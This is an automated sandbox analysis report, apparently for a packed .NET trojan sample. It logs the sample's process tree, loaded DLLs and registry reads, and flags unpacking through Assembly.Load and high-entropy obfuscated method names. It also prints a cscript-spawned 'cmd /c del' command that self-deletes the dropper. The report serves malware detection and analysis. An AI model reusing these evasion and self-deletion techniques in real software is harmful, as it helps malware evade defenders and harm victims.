              Source: classification engineClassification label: mal100.troj.evad.winEXE@267/1@11/6
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0062BCDF FormatMessageW,SysAllocString,LocalFree,GetLastError,WideCharToMultiByte,__alloca_probe_16,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,LocalFree,5_2_0062BCDF
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_006264E0 CLSIDFromString,CoCreateInstance,5_2_006264E0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_006382B5 FindResourceExW,LoadResource,5_2_006382B5
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AB2hQJZ77ipdWem.exe.logJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
              Source: AB2hQJZ77ipdWem.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: AB2hQJZ77ipdWem.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: AB2hQJZ77ipdWem.exeReversingLabs: Detection: 65%
              Source: unknownProcess created: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess created: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
              Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeProcess created: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"Jump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: AB2hQJZ77ipdWem.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: AB2hQJZ77ipdWem.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: cscript.pdbUGP source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453363872.0000000001050000.00000040.10000000.00040000.00000000.sdmp, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453117705.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1455290372.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1453154291.0000000004801000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: AB2hQJZ77ipdWem.exe, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000005.00000003.1455290372.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1453154291.0000000004801000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: cscript.pdb source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453363872.0000000001050000.00000040.10000000.00040000.00000000.sdmp, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453117705.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              .NET source code contains potential unpacker
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, L2MZqe5X1hqSn78nu9.cs.Net Code: WKA5gMpHji System.Reflection.Assembly.Load(byte[])
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, L2MZqe5X1hqSn78nu9.cs.Net Code: WKA5gMpHji System.Reflection.Assembly.Load(byte[])
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, L2MZqe5X1hqSn78nu9.cs.Net Code: WKA5gMpHji System.Reflection.Assembly.Load(byte[])
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0062AA82 LoadLibraryW,GetProcAddress,FreeLibrary,5_2_0062AA82
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 0_2_02F9BD62 push eax; retf 0_2_02F9BF59
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041EA56 push esp; ret 3_2_0041EA51
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_004176C3 push FCC6ED37h; retf 3_2_004176D5
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_00417782 push ds; ret 3_2_00417786
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0041CF88 push ecx; ret 3_2_0041CF89
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0109225F pushad ; ret 3_2_010927F9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010927FA pushad ; ret 3_2_010927F9
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C09AD push ecx; mov dword ptr [esp], ecx3_2_010C09B6
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0109283D push eax; iretd 3_2_01092858
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01091344 push eax; iretd 3_2_01091369
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01099939 push es; iretd 3_2_01099940
              Source: C:\Windows\explorer.exeCode function: 4_2_0E057B02 push esp; retn 0000h4_2_0E057B03
              Source: C:\Windows\explorer.exeCode function: 4_2_0E057B1E push esp; retn 0000h4_2_0E057B1F
              Source: C:\Windows\explorer.exeCode function: 4_2_0E0579B5 push esp; retn 0000h4_2_0E057AE7
              Source: C:\Windows\explorer.exeCode function: 4_2_10EB49B5 push esp; retn 0000h4_2_10EB4AE7
              Source: C:\Windows\explorer.exeCode function: 4_2_10EB4B02 push esp; retn 0000h4_2_10EB4B03
              Source: C:\Windows\explorer.exeCode function: 4_2_10EB4B1E push esp; retn 0000h4_2_10EB4B1F
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0062DF11 push ecx; ret 5_2_0062DF24
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B627FA pushad ; ret 5_2_04B627F9
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B6225F pushad ; ret 5_2_04B627F9
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B6283D push eax; iretd 5_2_04B62858
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B909AD push ecx; mov dword ptr [esp], ecx5_2_04B909B6
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027C76C3 push FCC6ED37h; retf 5_2_027C76D5
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027C7782 push ds; ret 5_2_027C7786
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CD4B5 push eax; ret 5_2_027CD508
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CD56C push eax; ret 5_2_027CD572
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CD50B push eax; ret 5_2_027CD572
              Source: AB2hQJZ77ipdWem.exeStatic PE information: section name: .text entropy: 7.981823321678096
              Source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
              Source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, A84fLPSIsCr4pNr2e1.csHigh entropy of concatenated method names: 'CqZw6peOhm', 'h1NwdADq3d', 'kWdwgNtrr6', 'tKZwb49V96', 'TDGw0B3Qdo', 'LOewkZkmgP', 'ra4wxwQchy', 'SLewmQL4wR', 'b5KwMJXskU', 'ocHwJY6SVD'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, HxZ91e2qtRrpVHMmHE.csHigh entropy of concatenated method names: 'JvnY22v44Q', 'TfyY8GdUjx', 'cipcAcUgVM', 'bJMcHogVH2', 'WyLYh4DXo0', 'ArEY1Lxfc2', 'rVNYQyA8Yf', 'LJLYphIsE6', 'iReYS5y7WR', 'wcgYOOMoiI'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, NByB4dfTi3kR926o21.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LORUajo9pN', 'nrJU8V4K0Q', 'xAMUzO6UGU', 'ieDlApofjr', 'YhylHKFY4A', 'kUYlU7dwQK', 'S33llmTWk8', 'LWWWSfiQgQOmjK7YI4v'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, yFkgMbnRXbdivPfDnN.csHigh entropy of concatenated method names: 'fXwcDiSmwy', 'RoocCmVKfm', 'dEhcobuAXj', 'giscy5PCA6', 'gD1cIoMu18', 'moncw3GYoS', 'MWrcZIjBpA', 'k79cVKkSEp', 'F7pcBw8mfL', 'RdMcuUBj5d'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, xxcXVGtMuD6epI0GiVX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D3rPp7pLnQ', 'CXRPS8MRun', 'L4dPOWF8fF', 'QVDPjSYdFU', 'ocXPX09tlX', 'Y3RPLU0xqI', 'e3dP38nnfU'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, lD2VpmLwy74UUFOu8Q.csHigh entropy of concatenated method names: 'zBlIex2kgA', 'TTkICLn9DY', 'd5lIyBkFPG', 'nT5IwTxQZD', 'fHtIZx4k1j', 'l7qyXvwF1t', 'PGUyLqH89g', 'QLuy38NPXM', 'HMuy2VcCdq', 'BI5yaHP11i'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, LbokTxtwlaCQP5t1Y5j.csHigh entropy of concatenated method names: 'S3it6vBg5B', 'tJctdRrX3S', 'QW0tgc8Inr', 'URQtbg3XE7', 'enlt01JULC', 'UT7tkkyNuM', 'zawtxrUOQ0', 'Jottmcx0vk', 'tJqtM4nx1u', 'OjFtJKELUR'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, oDbClXHY0rOWGmbvPY.csHigh entropy of concatenated method names: 'HPWwDrRFWb', 'iFawoXTHEO', 'zdewIAQtPG', 'MeQI8e8rFH', 'BmKIzethpY', 'LWJwATbDpJ', 'gD3wHMVGsI', 'hwTwUqKga7', 'dGJwl0gbRu', 'gJGw5AVq9s'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, fQsIIlXm3Yrb2eUDWF.csHigh entropy of concatenated method names: 'zlNCpIs07c', 'Ex0CSYgWDB', 'eCHCOlupMr', 'FcYCj8nsVG', 'cu0CXYg4jb', 'zX6CL2R0pq', 'e0mC3dNydv', 'R1bC2umg2C', 'jiCCa0HSsm', 'mn8C8moeUO'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, GEAuDLzPxjeVJtEtEV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oVrt9BkpYt', 'GgrtseS0Z4', 'Ae9tFE8YS0', 'PbTtYjNOlk', 'B4GtciECjo', 'qCltt0d9Hi', 'O6RtPOoLKp'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, ARLosMUu9ux5s4xeIQ.csHigh entropy of concatenated method names: 'Dr8y0bg4Hl', 'WXKyxwavvr', 'pIUoip4Wo3', 'PFQoRf85If', 'nVto47Tmty', 'ISooWqFtuC', 'wJRo7Ydcsq', 'msGorbEwew', 'IWooGJkW7V', 'p1hoq830g3'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, G8Ku1BusrwriixUXvf.csHigh entropy of concatenated method names: 'Dispose', 'TvrHaJCQ1p', 'hEcUfxi1e2', 'bo9nnr8ccn', 'yivH8a6WcD', 'qTJHzNAtOH', 'ProcessDialogKey', 'bFMUAv62VB', 'KSPUHS0cUD', 'xRsUUTgL5X'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, XZbuRmxnN4Wcbhfseq.csHigh entropy of concatenated method names: 'p3AobOLVmp', 'RJookTZ4DL', 'epsomG7uiO', 'fPOoMRkb32', 'keVosOXdGP', 'RUToFSapRT', 'tbSoY0UU0b', 'wgAocmN773', 'yuaotoAwpp', 'yafoPohyx1'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, loA94X8dLam0BqsKKi.csHigh entropy of concatenated method names: 'p3otHQ0nPa', 'iWatld1nL8', 'QdZt5Muccx', 'mSQtD9kPMN', 'IBUtClP6bA', 'TRbtyZp79I', 'wkAtII4tQf', 'bcec3uH7gj', 'MOJc2IZ33N', 'yOQcakq7Ky'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, j6fOLPhmGRO9utyHLj.csHigh entropy of concatenated method names: 'mPUgYaX1E', 'm5Db8RTXj', 'xepkaNjoB', 'KjhxDue0F', 'wYSMTm35W', 'HR0JHBagp', 'UP7A1n27KtoA8nlv3E', 'BVJdrnu5MoCBUv79dI', 'fXvcC1uce', 'mFMPlcOp6'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, sCfYWWat39XY9HRk8e.csHigh entropy of concatenated method names: 'JsJ9mBHmrh', 'eEj9MPk3Lr', 'auU9KBAPm5', 'MA89fDSb3E', 'kVt9R3VjKZ', 'rFA94NkOYh', 'gEu97BwJJ2', 'yKl9r2LDAS', 'siL9qouSRo', 'GwC9h036K9'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, nwSOv7QdTPQVDnqvB5.csHigh entropy of concatenated method names: 'YFIIODs1Qq', 'eMrIjPR59C', 'CWUIXJJclv', 'ToString', 'b1EILg492q', 'dhHI3YO57p', 'fPURABtZkDkJGDkukuF', 'VNT54Ht2aG4SYgCikQ0'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, AC6LD60IT9CHcXjx6o.csHigh entropy of concatenated method names: 'UBkHww0qQk', 'YHJHZlGipT', 'wqbHByvlAW', 'YyTHuP0E02', 'lMBHsTxD5S', 'rrFHFIeKN0', 'KfssLM3mfNp9xYmpi7', 'YkOdMoqbDQdll6TluN', 'kBfHBDxHoLg4aO1GCk', 'hiaHHpuPGZ'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, L2MZqe5X1hqSn78nu9.csHigh entropy of concatenated method names: 'BXNlelgRv2', 'e5KlDvYpS9', 'MTplCZsji2', 'hH9loHR14V', 'mMulyl8D83', 'xF9lIapcck', 'heslwdS87o', 'U7vlZGteKq', 'zIUlVIXyTG', 'vXqlBfkOaL'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, sWtfTvoZJQoijAEbp3.csHigh entropy of concatenated method names: 'nJIcKGaJOo', 'gD8cfRUFa6', 'YwociolUoZ', 'ANPcRphJsk', 'YhXcpT12bp', 'VsUc4cQLKq', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, A84fLPSIsCr4pNr2e1.csHigh entropy of concatenated method names: 'CqZw6peOhm', 'h1NwdADq3d', 'kWdwgNtrr6', 'tKZwb49V96', 'TDGw0B3Qdo', 'LOewkZkmgP', 'ra4wxwQchy', 'SLewmQL4wR', 'b5KwMJXskU', 'ocHwJY6SVD'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, HxZ91e2qtRrpVHMmHE.csHigh entropy of concatenated method names: 'JvnY22v44Q', 'TfyY8GdUjx', 'cipcAcUgVM', 'bJMcHogVH2', 'WyLYh4DXo0', 'ArEY1Lxfc2', 'rVNYQyA8Yf', 'LJLYphIsE6', 'iReYS5y7WR', 'wcgYOOMoiI'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, NByB4dfTi3kR926o21.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LORUajo9pN', 'nrJU8V4K0Q', 'xAMUzO6UGU', 'ieDlApofjr', 'YhylHKFY4A', 'kUYlU7dwQK', 'S33llmTWk8', 'LWWWSfiQgQOmjK7YI4v'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, yFkgMbnRXbdivPfDnN.csHigh entropy of concatenated method names: 'fXwcDiSmwy', 'RoocCmVKfm', 'dEhcobuAXj', 'giscy5PCA6', 'gD1cIoMu18', 'moncw3GYoS', 'MWrcZIjBpA', 'k79cVKkSEp', 'F7pcBw8mfL', 'RdMcuUBj5d'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, xxcXVGtMuD6epI0GiVX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D3rPp7pLnQ', 'CXRPS8MRun', 'L4dPOWF8fF', 'QVDPjSYdFU', 'ocXPX09tlX', 'Y3RPLU0xqI', 'e3dP38nnfU'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, lD2VpmLwy74UUFOu8Q.csHigh entropy of concatenated method names: 'zBlIex2kgA', 'TTkICLn9DY', 'd5lIyBkFPG', 'nT5IwTxQZD', 'fHtIZx4k1j', 'l7qyXvwF1t', 'PGUyLqH89g', 'QLuy38NPXM', 'HMuy2VcCdq', 'BI5yaHP11i'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, LbokTxtwlaCQP5t1Y5j.csHigh entropy of concatenated method names: 'S3it6vBg5B', 'tJctdRrX3S', 'QW0tgc8Inr', 'URQtbg3XE7', 'enlt01JULC', 'UT7tkkyNuM', 'zawtxrUOQ0', 'Jottmcx0vk', 'tJqtM4nx1u', 'OjFtJKELUR'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, oDbClXHY0rOWGmbvPY.csHigh entropy of concatenated method names: 'HPWwDrRFWb', 'iFawoXTHEO', 'zdewIAQtPG', 'MeQI8e8rFH', 'BmKIzethpY', 'LWJwATbDpJ', 'gD3wHMVGsI', 'hwTwUqKga7', 'dGJwl0gbRu', 'gJGw5AVq9s'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, fQsIIlXm3Yrb2eUDWF.csHigh entropy of concatenated method names: 'zlNCpIs07c', 'Ex0CSYgWDB', 'eCHCOlupMr', 'FcYCj8nsVG', 'cu0CXYg4jb', 'zX6CL2R0pq', 'e0mC3dNydv', 'R1bC2umg2C', 'jiCCa0HSsm', 'mn8C8moeUO'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, GEAuDLzPxjeVJtEtEV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oVrt9BkpYt', 'GgrtseS0Z4', 'Ae9tFE8YS0', 'PbTtYjNOlk', 'B4GtciECjo', 'qCltt0d9Hi', 'O6RtPOoLKp'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, ARLosMUu9ux5s4xeIQ.csHigh entropy of concatenated method names: 'Dr8y0bg4Hl', 'WXKyxwavvr', 'pIUoip4Wo3', 'PFQoRf85If', 'nVto47Tmty', 'ISooWqFtuC', 'wJRo7Ydcsq', 'msGorbEwew', 'IWooGJkW7V', 'p1hoq830g3'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, G8Ku1BusrwriixUXvf.csHigh entropy of concatenated method names: 'Dispose', 'TvrHaJCQ1p', 'hEcUfxi1e2', 'bo9nnr8ccn', 'yivH8a6WcD', 'qTJHzNAtOH', 'ProcessDialogKey', 'bFMUAv62VB', 'KSPUHS0cUD', 'xRsUUTgL5X'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, XZbuRmxnN4Wcbhfseq.csHigh entropy of concatenated method names: 'p3AobOLVmp', 'RJookTZ4DL', 'epsomG7uiO', 'fPOoMRkb32', 'keVosOXdGP', 'RUToFSapRT', 'tbSoY0UU0b', 'wgAocmN773', 'yuaotoAwpp', 'yafoPohyx1'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, loA94X8dLam0BqsKKi.csHigh entropy of concatenated method names: 'p3otHQ0nPa', 'iWatld1nL8', 'QdZt5Muccx', 'mSQtD9kPMN', 'IBUtClP6bA', 'TRbtyZp79I', 'wkAtII4tQf', 'bcec3uH7gj', 'MOJc2IZ33N', 'yOQcakq7Ky'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, j6fOLPhmGRO9utyHLj.csHigh entropy of concatenated method names: 'mPUgYaX1E', 'm5Db8RTXj', 'xepkaNjoB', 'KjhxDue0F', 'wYSMTm35W', 'HR0JHBagp', 'UP7A1n27KtoA8nlv3E', 'BVJdrnu5MoCBUv79dI', 'fXvcC1uce', 'mFMPlcOp6'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, sCfYWWat39XY9HRk8e.csHigh entropy of concatenated method names: 'JsJ9mBHmrh', 'eEj9MPk3Lr', 'auU9KBAPm5', 'MA89fDSb3E', 'kVt9R3VjKZ', 'rFA94NkOYh', 'gEu97BwJJ2', 'yKl9r2LDAS', 'siL9qouSRo', 'GwC9h036K9'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, nwSOv7QdTPQVDnqvB5.csHigh entropy of concatenated method names: 'YFIIODs1Qq', 'eMrIjPR59C', 'CWUIXJJclv', 'ToString', 'b1EILg492q', 'dhHI3YO57p', 'fPURABtZkDkJGDkukuF', 'VNT54Ht2aG4SYgCikQ0'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, AC6LD60IT9CHcXjx6o.csHigh entropy of concatenated method names: 'UBkHww0qQk', 'YHJHZlGipT', 'wqbHByvlAW', 'YyTHuP0E02', 'lMBHsTxD5S', 'rrFHFIeKN0', 'KfssLM3mfNp9xYmpi7', 'YkOdMoqbDQdll6TluN', 'kBfHBDxHoLg4aO1GCk', 'hiaHHpuPGZ'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, L2MZqe5X1hqSn78nu9.csHigh entropy of concatenated method names: 'BXNlelgRv2', 'e5KlDvYpS9', 'MTplCZsji2', 'hH9loHR14V', 'mMulyl8D83', 'xF9lIapcck', 'heslwdS87o', 'U7vlZGteKq', 'zIUlVIXyTG', 'vXqlBfkOaL'
